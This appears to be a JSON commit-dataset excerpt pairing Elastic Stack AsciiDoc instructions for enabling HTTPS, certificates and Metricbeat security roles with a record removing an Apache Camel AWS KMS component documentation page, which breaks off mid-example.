{metricbeat}, you configure the connections to {es} and\n{kib}. You can configure authentication to send data to your secured cluster\nusing basic authentication, API key authentication, or Public Key\nInfrastructure (PKI) certificates.\n\nThe following instructions use the credentials for the `metricbeat_writer`\nand `metricbeat_setup` users that you created. If you need a greater level of\nsecurity, we recommend using PKI certificates.\n\nAfter configuring connections to {es} and {kib}, you'll enable the\n`elasticsearch-xpack` module and configure that module to use HTTPS.\n\nWARNING: In production environments, we strongly recommend using a separate\ncluster (referred to as the monitoring cluster) to store your data. Using a\nseparate monitoring cluster prevents production cluster outages from impacting\nyour ability to access your monitoring data. It also prevents monitoring\nactivities from impacting the performance of your production cluster.\n\n. From the directory where you installed Elasticsearch, navigate to the\n`\/kibana` directory that you created when <<encrypt-http-communication,encrypting HTTP client communications for {es}>>.\n\n. Copy the `elasticsearch-ca.pem` certificate to the directory where you\ninstalled {metricbeat}.\n\n. Open the `metricbeat.yml` configuration file and configure the connection\nto {es}.\n+\nUnder `output.elasticsearch`, specify the following fields:\n+\n[source,yaml]\n----\noutput.elasticsearch:\n hosts: [\"<your_elasticsearch_host>:9200\"]\n protocol: \"https\"\n username: \"metricbeat_writer\"\n password: \"<password>\"\n ssl:\n certificate_authorities: [\"elasticsearch-ca.pem\"]\n verification_mode: \"certificate\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n\n `protocol`:: Indicates the protocol to use when connecting to Elasticsearch.\n This value must be `https`.\n\n `username`:: Name of the user with privileges required to publish events to\n Elasticsearch. The `metricbeat_writer` user that you created has these\n privileges.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to the local `.pem` file that\n contains your CA's certificate. \n\n. Configure the connection to {kib}.\n+\nUnder `setup.kibana`, specify the following fields:\n+\n[source,yaml]\n----\nsetup.kibana\n host: \"https:\/\/<your_elasticsearch_host>:5601\"\n ssl.enabled: true\n username: \"metricbeat_setup\"\n password: \"p@ssw0rd\"\n----\n\n `hosts`:: The URLs of the {es} instances to use for all your\n queries. Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges required to set up dashboards in {kib}. The `metricbeat_setup` user that you created has these privileges.\n\n `password`:: Password for the indicated `username`.\n\n. Enable the `elasticsearch-xpack` module.\n+\n[source,shell]\n----\n.\/metricbeat modules enable elasticsearch-xpack\n----\n\n. Modify the `elasticsearch-xpack` module to use HTTPS. This module collects\nmetrics about {es}.\n+\nOpen `\/modules.d\/elasticsearch-xpack.yml` and specify the following fields:\n+\n[source,yaml]\n----\n- module: elasticsearch\n xpack.enabled: true\n period: 10s\n hosts: [\"https:\/\/<your_elasticsearch_host>:9200\"]\n username: \"remote_monitoring_user\"\n password: \"<password>\"\n ssl: <1>\n enabled: true\n certificate_authorities: [\"elasticsearch-ca.pem\"]\n verification_mode: \"certificate\"\n----\n<1> Configuring SSL is required when monitoring a node with encrypted traffic.\nSee {metricbeat-ref}\/configuration-ssl.html[Configure SSL for {metricbeat}].\n\n `hosts`:: Specifies the host where your {es} cluster is running.\n Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges to collect metric data. The\n built-in `monitoring_user` user has these privileges. Alternatively,\n you can create a user and assign it the `monitoring_user` role.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to the local `.pem` file that\n contains your CA's certificate. \n\n. If you want to use the predefined assets for parsing, indexing, and\n visualizing your data, run the following command to load these assets:\n+\n[source,shell]\n----\n.\/metricbeat setup -e\n----\n\n. Start Elasticsearch, and then start Metricbeat.\n+\n[source,shell]\n----\n\/.metricbeat -e\n----\n+\n`-e` is optional and sends output to standard error instead of the configured\nlog output.\n\n. Log in to Kibana, open the main menu, and click **Stack Monitoring**.\n+\nYou\u2019ll see cluster alerts that require your attention and a summary of the available monitoring metrics for Elasticsearch. Click any of the header links on the available cards to view additional information.\n","old_contents":"[[security-basic-setup-https]]\n=== Set up basic security for the Elastic Stack plus secured HTTPS traffic\n++++\n<titleabbrev>Set up basic security plus HTTPS<\/titleabbrev>\n++++\n\nIn a production environment, some {es} features such as tokens and\nAPI keys will be disabled unless you enable TLS on the HTTP layer. This\nadditional layer of security ensures that all communications to and from your\ncluster are secured.\n\nWhen you run the `elasticsearch-certutil` tool in `http` mode, the tool asks\nseveral questions about how you want to generate certificates. While there are\nnumerous options, the following choices result in certificates that should\nwork for most environments.\n\n[[signing-certificates]]\n.Signing certificates\n****\nThe first question that the `elasticsearch-certutil` tool prompts you with is\nwhether you want to generate a Certificate Signing Request (CSR). Answer\n`n` if you want to sign your own certificates, or `y` if you want to sign\ncertificates with a central CA.\n\n[discrete]\n===== Sign your own certificates\n\nIf you want to use the CA that you created when\n<<generate-certificates,Generating the certificate authority>> answer `n` when\nasked if you want to generate a CSR. You then specify the location of your CA,\nwhich the tool uses to sign and generate a `.p12` certificate. The steps in\nthis procedure follow this workflow.\n\n[discrete]\n===== Sign certificates with a central CA\n\nIf you work in an environment with a central security team, they can likely\ngenerate a certificate for you. Infrastructure within your organization\nmight already be configured to trust an existing CA, so it may be easier\nfor clients to connect to {es} if you use a CSR and send that\nrequest to the team that controls your CA. To use a central CA, answer `y` to\nthe first question.\n****\n\n[[basic-setup-https-prerequisites]]\n==== Prerequisites\n\nComplete all steps in <<security-basic-setup,Set up basic security for the Elastic Stack>>.\n\n[[encrypt-http-communication]]\n==== Encrypt HTTP client communications for {es}\n\n. Stop {es} and {kib} if they are running.\n\n. From the directory where you installed {es}, run the {es}\n HTTP certificate tool to generate a Certificate Signing Request (CSR).\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil http\n----\n+\nThis command generates a `.zip` file that contains certificates and keys\nto use with {es} and {kib}. Each folder contains a `README.txt`\nexplaining how to use these files.\n\n a. When asked if you want to generate a CSR, enter `n`.\n\n b. When asked if you want to use an existing CA, enter `y`.\n\n c. Enter the path to your CA. This is the absolute path to\n the `elastic-stack-ca.p12` file that you generated for your cluster.\n\n d. Enter the password for your CA.\n\n e. Enter an expiration value for your certificate. You can enter the\n validity period in years, months, or days. For example, enter `90D` for 90\n days.\n\n f. When asked if you want to generate one certificate per node, enter `y`.\n+\nEach certificate will have its own private key, and will be issued for a\nspecific hostname or IP address.\n\n g. When prompted, enter the name of the first node in your cluster. Use the same node name that you used when <<generate-certificates,generating node certificates>>.\n\n h. Enter all hostnames used to connect to your first node. These hostnames\n will be added as DNS names in the Subject Alternative Name (SAN) field in your certificate.\n+\nList every hostname and variant used to connect to your cluster over HTTPS.\n\n i. Enter the IP addresses that clients can use to connect to your node.\n\n j. Repeat these steps for each additional node in your cluster.\n\n. After generating a certificate for each of your nodes, enter a password for\n your private key when prompted.\n\n. Unzip the generated `elasticsearch-ssl-http.zip` file. This compressed file\n contains one directory for both {es} and {kib}.\n+\n--\n[source,txt]\n----\n\/elasticsearch\n|_ README.txt\n|_ http.p12\n|_ sample-elasticsearch.yml\n----\n\n[source,txt]\n----\n\/kibana\n|_ README.txt\n|_ elasticsearch-ca.pem\n|_ sample-kibana.yml\n----\n--\n\n. Copy the relevant `http.p12` certificate to the `ES_PATH_CONF` directory on each node.\n\n. On each node, edit the `elasticsearch.yml` file to enable HTTPS security and\n specify the location of the `http.p12` security certificate.\n+\n[source,yaml]\n----\nxpack.security.http.ssl.enabled: true\nxpack.security.http.ssl.keystore.path: http.p12\n----\n\n. Add the password for your private key to the secure settings in {es}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-keystore add xpack.security.http.ssl.keystore.secure_password\n----\n\n. Start {es}.\n\n**Next**: <<encrypt-kibana-http,Encrypt HTTP client communications for {kib}>>\n\n[[encrypt-kibana-http]]\n==== Encrypt HTTP client communications for {kib}\n\nBrowsers send traffic to {kib} and {kib} sends traffic to {es}.\nThese communication channels are configured separately to use TLS. You encrypt\ntraffic between your browser and {kib}, and then encrypt traffic between\n{kib} and {es}.\n\n[[encrypt-kibana-elasticsearch]]\n===== Encrypt traffic between {kib} and {es}\n\nWhen you ran the `elasticsearch-certutil` tool with the `http` option, it\ncreated a `\/kibana` directory containing an `elasticsearch-ca.pem` file. You\nuse this file to configure {kib} to trust the {es} CA for the HTTP\nlayer.\n\n1. Copy the `elasticsearch-ca.pem` file to the {kib} configuration directory,\nas defined by the `KBN_PATH_CONF` path.\n\n2. Open `kibana.yml` and add the following line to specify the location of the\nsecurity certificate for the HTTP layer.\n+\n[source,yaml]\n----\nelasticsearch.ssl.certificateAuthorities: KBN_PATH_CONF\/elasticsearch-ca.pem\n----\n\n3. Add the following line to specify the HTTPS URL for your {es}\ncluster.\n+\n[source,yaml]\n----\nelasticsearch.hosts: https:\/\/<your_elasticsearch_host>.com:9200\n----\n\n4. Restart {kib}.\n\n.Connect to a secure monitoring cluster\n****\nIf the Elastic monitoring features are enabled and you configured a separate\n{es} monitoring cluster, you can also configure {kib} to connect to\nthe monitoring cluster via HTTPS. The steps are the same, but each setting is\nprefixed by `monitoring`. For example, `monitoring.ui.elasticsearch.hosts` and\n`monitoring.ui.elasticsearch.ssl.truststore.path`.\n\nNOTE: You must create a separate `elasticsearch-ca.pem` security file for the\nmonitoring cluster.\n****\n\n**Next**: <<encrypt-kibana-browser,Encrypt traffic between your browser and {kib}>>\n\n[[encrypt-kibana-browser]]\n===== Encrypt traffic between your browser and {kib}\n\nYou create a server certificate and private key for {kib}. {kib} uses this\nserver certificate and corresponding private key when receiving connections\nfrom web browsers.\n\nWhen you obtain a server certificate, you must set its subject alternative\nname (SAN) correctly to ensure that browsers will trust it. You can set one or\nmore SANs to the {kib} server\u2019s fully-qualified domain name (FQDN), hostname,\nor IP address. When choosing the SAN, pick whichever attribute you'll use to\nconnect to {kib} in your browser, which is likely the FQDN.\n\nThe following instructions create a Certificate Signing Request (CSR) for {kib}.\nA CSR contains information that a CA uses to generate and sign a security\ncertificate. The certificate can be trusted (signed by a public, trusted CA)\nor untrusted (signed by an internal CA). A self-signed or internally-signed\ncertificate is acceptable for development environments and building a proof of\nconcept, but should not be used in a production environment.\n\nWARNING: Before going to production, use a trusted CA such as https:\/\/letsencrypt.org\/[Let's\nEncrypt] or your organization's internal CA to sign the certificate. Using a\nsigned certificate establishes browser trust for connections to {kib} for\ninternal access or on the public internet.\n\n. Generate a server certificate and private key for {kib}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil csr -name kibana-server -dns example.com,www.example.com\n----\n+\nThe CSR has a common name (CN) of `kibana-server`, a SAN of `example.com`,\nand another SAN of `www.example.com`.\n+\nThis command generates a `csr-bundle.zip` file by default with the following\ncontents:\n+\n[source,txt]\n----\n\/kibana-server\n|_ kibana-server.csr\n|_ kibana-server.key\n----\n\n. Unzip the `csr-bundle.zip` file to obtain the `kibana-server.csr` unsigned\nsecurity certificate and the `kibana-server.key` unencrypted private key.\n\n. Send the `kibana-server.csr` certificate signing request to your internal\nCA or trusted CA for signing to obtain a signed certificate. The signed file\ncan be in different formats, such as a `.crt` file like `kibana-server.crt`.\n\n. Open `kibana.yml` and add the following lines to configure {kib} to access\nthe server certificate and unencrypted private key.\n+\n[source,yaml]\n----\nserver.ssl.certificate: KBN_PATH_CONF\/kibana-server.crt\nserver.ssl.key: KBN_PATH_CONF\/kibana-server.key\n----\n+\nNOTE: `KBN_PATH_CONF` contains the path for the {kib} configuration files. If\nyou installed {kib} using archive distributions (`zip` or `tar.gz`), the\npath defaults to `KBN_HOME\/config`. If you used package distributions\n(Debian or RPM), the path defaults to `\/etc\/kibana`.\n\n. Add the following line to `kibana.yml` to enable TLS for inbound\nconnections.\n+\n[source,yaml]\n----\nserver.ssl.enabled: true\n----\n\n. Start {kib}.\n\nNOTE: After making these changes, you must always access {kib} via HTTPS. For\nexample, `https:\/\/<your_kibana_host>.com`.\n\n**Next**: <<configure-beats-security,Configure {beats} security>>\n\n[[configure-beats-security]]\n==== Configure {beats} security\n\nThe {beats} are open source data shippers that you install as agents on your\nservers to send operational data to {es}. Each Beat is a separately\ninstallable product. The following steps cover configuring security for\n{metricbeat}. Follow these steps for each https:\/\/www.elastic.co\/guide\/en\/elastic-stack-get-started\/7.9\/get-started-elastic-stack.html#install-beats[additonal Beat] you want to configure security for.\n\n===== Prerequisites\n\nhttps:\/\/www.elastic.co\/guide\/en\/beats\/metricbeat\/7.9\/metricbeat-installation-configuration.html[Install {metricbeat}] using your preferred method.\n\nNOTE: You cannot connect to the Elastic Stack or set up assets for {metricbeat}\nbefore completing the following steps.\n\n===== Create roles for {metricbeat}\nTypically, you need to create the following separate roles:\n\n- **setup** role for setting up index templates and other dependencies\n- **monitoring** role for sending monitoring information\n- **writer** role for publishing events collected by Metricbeat\n- **reader** role for Kibana users who need to view and create visualizations that access Metricbeat data\n\nNOTE: These instructions assume that you are using the default name for\n{metricbeat} indices. If the indicated index names are not listed, or you are\nusing a custom name, enter it manually when defining roles and modify the\nprivileges to match your index naming pattern.\n\nTo create users and roles from Stack Management in {kib}, select **Roles**\nor **Users** from the side navigation.\n\n**Next**: <<beats-setup-role,Create a setup role>>\n\n[discrete]\n[[beats-setup-role]]\n====== Create a setup role and user\n\nAdministrators who set up {metricbeat} typically need to load mappings,\ndashboards, and other objects used to index data into {es} and visualize it in\n{kib}.\n\nWARNING: Setting up {metricbeat} is an admin-level task that requires extra\nprivileges. As a best practice, grant the setup role to administrators only,\nand use a more restrictive role for event publishing.\n\n1. Create the setup role:\n\n a. Enter **metricbeat_setup** as the role name.\n\n b. Choose the **monitor** and **manage_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **manage** and **write**\n privileges.\n+\nIf the **metricbeat-\\*** indices aren't listed, enter that pattern into the\nlist of indices.\n\n2. Create the setup user:\n\n a. Enter **metricbeat_setup** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_setup** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_setup` | Set up {metricbeat}.\n| `kibana_admin` | Load dependencies, such as example dashboards, if available, into {kib}\n| `ingest_admin` | Set up index templates and, if available, ingest pipelines\n| `beats_admin` | Enroll and manage configurations in {beats} central management\n|===\n\n**Next**: <<beats-monitoring-role,Create a monitoring role>>\n\n[discrete]\n[[beats-monitoring-role]]\n====== Create a monitoring role and user\n\nTo send monitoring data securely, create a monitoring user and grant it the\nnecessary privileges.\n\nYou can use the built-in `beats_system` user, if it\u2019s available in your\nenvironment. Because the built-in users are not available in Elastic Cloud,\nthese instructions create a user that is explicitly used for monitoring\n{metricbeat}.\n\n1. Create the monitoring role:\n\n a. Enter **metricbeat_monitoring** as the role name.\n\n b. Choose the **monitor** cluster privilege.\n\n c. On the **.monitoring-beats-\\*** indices, choose the **create_index** and\n **create_doc** privileges.\n\n2. Create the monitoring user:\n\n a. Enter **metricbeat_monitoring** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_monitoring** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_monitoring` | Monitor {metricbeat}.\n| `kibana_admin` | Use {kib}\n| `monitoring_user` | Use Stack Monitoring in {kib} to monitor {metricbeat}\n|===\n\n**Next**: <<beats-writer-role,Create a writer role>>\n\n[discrete]\n[[beats-writer-role]]\n====== Create a writer role and user\n\nUsers who publish events to {es} need to create and write to {metricbeat} indices. To minimize the privileges required by the writer role, use the setup role to pre-load dependencies. This section assumes that you\u2019ve\n<<beats-setup-role,created the setup role>>.\n\n1. Create the writer role:\n\n a. Enter **metricbeat_writer** as the role name.\n\n b. Choose the **monitor** and **read_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **create_doc**, **create_index**, and **view_index_metadata** privileges.\n\n2. Create the writer user:\n\n a. Enter **metricbeat_writer** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_writer** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_writer` | Monitor {metricbeat}\n| `remote_monitoring_collector` | Collect monitoring metrics from {metricbeat}\n| `remote_monitoring_agent` | Send monitoring data to the monitoring cluster\n|===\n\n**Next**: <<beats-reader-role,Create a reader role>>\n\n[discrete]\n[[beats-reader-role]]\n====== Create a reader role and user\n\n{kib} users typically need to view dashboards and visualizations that contain\n{metricbeat} data. These users might also need to create and edit dashboards\nand visualizations. Create the reader role to assign proper privileges to these\nusers.\n\n1. Create the reader role:\n\n a. Enter **metricbeat_reader** as the role name.\n\n b. On the **metricbeat-\\*** indices, choose the **read** privilege.\n\n c. Under **Kibana**, click **Add Kibana privilege**.\n\n - Under **Spaces**, choose **Default**.\n\n - Choose **Read** or **All** for Discover, Visualize, Dashboard, and Metrics.\n\n2. Create the reader user:\n\n a. Enter **metricbeat_reader** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_reader** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_reader` | Read {metricbeat} data.\n| `monitoring_user` | Allow users to monitor the health of {metricbeat}\nitself. Only assign this role to users who manage {metricbeat}\n| `beats_admin` | Create and manage configurations in {beats} central\nmanagement. Only assign this role to users who need to use {beats} central\nmanagement.\n|===\n\n**Next**: <<configure-metricbeat-tls,Configure {metricbeat} to use TLS>>\n\n[discrete]\n[[configure-metricbeat-tls]]\n===== Configure {metricbeat} to use TLS\n\nBefore starting {metricbeat}, you configure the connections to {es} and\nKibana. You can configure authentication to send data to your secured cluster\nusing basic authentication, API key authentication, or Public Key\nInfrastructure (PKI) certificates.\n\nThe following instructions use the credentials for the `metricbeat_writer`\nand `metricbeat_setup` users that you created. If you need a greater level of\nsecurity, we recommend using PKI certificates.\n\nAfter configuring connections to Elasticsearch and Kibana, you'll enable the\n`elasticsearch-xpack` module and configure that module to use HTTPS.\n\nWARNING: In production environments, we strongly recommend using a separate\ncluster (referred to as the monitoring cluster) to store your data. Using a\nseparate monitoring cluster prevents production cluster outages from impacting\nyour ability to access your monitoring data. It also prevents monitoring\nactivities from impacting the performance of your production cluster.\n\n. From the directory where you installed Elasticsearch, navigate to the\n`\/kibana` directory that you created when <<encrypt-http-communication,encrypting HTTP client communications for {es}>>.\n\n. Copy the `elasticsearch-ca.pem` certificate to the directory where you\ninstalled Metricbeat.\n\n. Open the `metricbeat.yml` configuration file and configure the connection\nto Elasticsearch.\n+\nUnder `output.elasticsearch`, specify the following fields:\n+\n[source,yaml]\n----\noutput.elasticsearch:\n hosts: [\"<your_elasticsearch_host>:9200\"]\n protocol: \"https\"\n username: \"metricbeat_writer\"\n password: \"<password>\"\n ssl:\n certificate_authorities: [\"elasticsearch-ca.pem\"]\n verification_mode: \"certificate\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n\n `protocol`:: Indicates the protocol to use when connecting to Elasticsearch.\n This value must be `https`.\n\n `username`:: Name of the user with privileges required to publish events to\n Elasticsearch. The `metricbeat_writer` user that you created has these\n privileges.\n\n `password`:: Password for the indicated `username`.\n\n `certificate_authorities`:: Indicates the path to your trusted CA.\n\n. Configure the connection to Kibana.\n+\nUnder `setup.kibana`, specify the following fields:\n+\n[source,yaml]\n----\nsetup.kibana\n host: \"https:\/\/<your_elasticsearch_host>:5601\"\n ssl.enabled: true\n username: \"metricbeat_setup\"\n password: \"p@ssw0rd\"\n----\n\n `hosts`:: The URLs of the Elasticsearch instances to use for all your\n queries. Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges required to set up dashboards in Kibana. The `metricbeat_setup` user that you created has these privileges.\n\n `password`:: Password for the indicated `username`.\n\n. Enable the `elasticsearch-xpack` module.\n+\n[source,shell]\n----\n.\/metricbeat modules enable elasticsearch-xpack\n----\n\n. Modify the `elasticsearch-xpack` module to use HTTPS.\n+\nOpen `\/modules.d\/elasticsearch-xpack.yml` and specify the following fields:\n+\n[source,yaml]\n----\n- module: elasticsearch\n xpack.enabled: true\n period: 10s\n hosts: [\"https:\/\/<your_elasticsearch_host>:9200\"]\n username: \"remote_monitoring_user\"\n password: \"<password>\"\n----\n\n `hosts`:: Specifies the host where your Elasticsearch cluster is running.\n Ensure that you include `https` in the URL.\n\n `username`:: Name of the user with privileges to collect metric data. The\n built-in `monitoring_user` user has these privileges. Alternatively,\n you can create a user and assign it the `monitoring_user` role.\n\n `password`:: Password for the indicated `username`.\n\n. If you want to use the predefined assets for parsing, indexing, and\n visualizing your data, run the following command to load these assets:\n+\n[source,shell]\n----\n.\/metricbeat setup -e\n----\n\n. Start Elasticsearch, and then start Metricbeat.\n+\n[source,shell]\n----\n\/.metricbeat -e\n----\n+\n`-e` is optional and sends output to standard error instead of the configured\nlog output.\n\n. Log in to Kibana, open the main menu, and click **Stack Monitoring**.\n+\nYou\u2019ll see cluster alerts that require your attention and a summary of the available monitoring metrics for Elasticsearch. Click any of the header links on the available cards to view additional information.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be04eb7624505d89843a3abc4f6444ab6e2ad7b","subject":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, docs","message":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, docs\n","repos":"apache\/camel,mcollovati\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,DariusX\/camel,adessaigne\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,pmoerenhout\/camel,mcollovati\/camel,cunningt\/camel,adessaigne\/camel,DariusX\/camel,pmoerenhout\/camel,tadayosi\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,adessaigne\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,alvinkwekel\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,tdiesler\/camel,gnodet\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,alvinkwekel\/camel,DariusX\/camel,christophd\/camel,pmoerenhout\/camel,tdiesler\/camel,zregvart\/camel,pax95\/camel,zregvart\/camel,nicolaferraro\/camel,nicolaferraro\/camel,cunningt\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,ullgren\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,gnodet\/camel,apache\/camel,cunningt\/camel,nikhilvibhav\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws-kms-component.adoc","new_contents":"","old_contents":"[[aws-kms-component]]\n= AWS KMS Component\n\n*Since Camel 2.21*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n== URI Format\n\n[source,java]\n-------------------------\naws-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS KMS component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS KMS default configuration | | KMSConfiguration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which KMS client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS KMS endpoint is configured using URI syntax:\n\n----\naws-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | AWSKMS\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform | | KMSOperations\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client | HTTPS | Protocol\n| *region* (producer) | The region in which KMS client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-aws-kms-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 15 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.aws-kms.access-key* | Amazon AWS Access Key | | String\n| *camel.component.aws-kms.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.aws-kms.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.aws-kms.configuration.access-key* | Amazon AWS Access Key | | String\n| *camel.component.aws-kms.configuration.kms-client* | To use a existing configured AWS KMS as client | | AWSKMS\n| *camel.component.aws-kms.configuration.operation* | The operation to perform | | KMSOperations\n| *camel.component.aws-kms.configuration.proxy-host* | To define a proxy host when instantiating the KMS client | | String\n| *camel.component.aws-kms.configuration.proxy-port* | To define a proxy port when instantiating the KMS client | | Integer\n| *camel.component.aws-kms.configuration.proxy-protocol* | To define a proxy protocol when instantiating the KMS client | | Protocol\n| *camel.component.aws-kms.configuration.region* | The region in which KMS client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *camel.component.aws-kms.configuration.secret-key* | Amazon AWS Secret Key | | String\n| *camel.component.aws-kms.enabled* | Whether to enable auto configuration of the aws-kms component. This is enabled by default. | | Boolean\n| *camel.component.aws-kms.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n| *camel.component.aws-kms.region* | The region in which KMS client needs to work | | String\n| *camel.component.aws-kms.secret-key* | Amazon AWS Secret Key | | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operation on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n 